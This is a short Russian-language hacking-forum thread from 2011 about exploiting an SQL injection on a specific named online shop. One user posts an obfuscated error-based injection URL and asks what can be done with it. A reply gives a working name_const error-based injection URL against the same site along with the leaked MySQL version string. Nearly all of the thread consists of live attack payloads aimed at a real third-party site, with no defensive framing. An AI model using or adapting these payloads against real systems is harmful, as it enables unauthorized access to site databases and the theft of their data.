19.09.2011, 19:32
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от jawbreaker
Что можно сделать если есть вот такая sql injection:
Код:
http://mirplombir.ru/index.php?searchstring=1\\%27%29%29or%28SELECT%28COUNT%28*%29%29FR%20%20OM%28%28SELECT%281%29%29UNION%28SELECT%282%29%29UNION%28SELECT%283%29%29%29x/**/GROUP/**/BY/**/MID%28VERSION%28%29,FLOOR%28RAND%280%29*2%29,64%29%29%23%20UNION%20SELECT%201%20--%20%20%27
При этом во время моих экспериментов часто перебрасывает на сайт хостера, где написано Попробовать здесь.
Сообщение от None
http://mirplombir.ru/index.php?news=2'and(select*from(select(name_const (version(),1)),name_const(version(),1))a)and'
Duplicate column name '5.1.50-lk-log'
|
|
|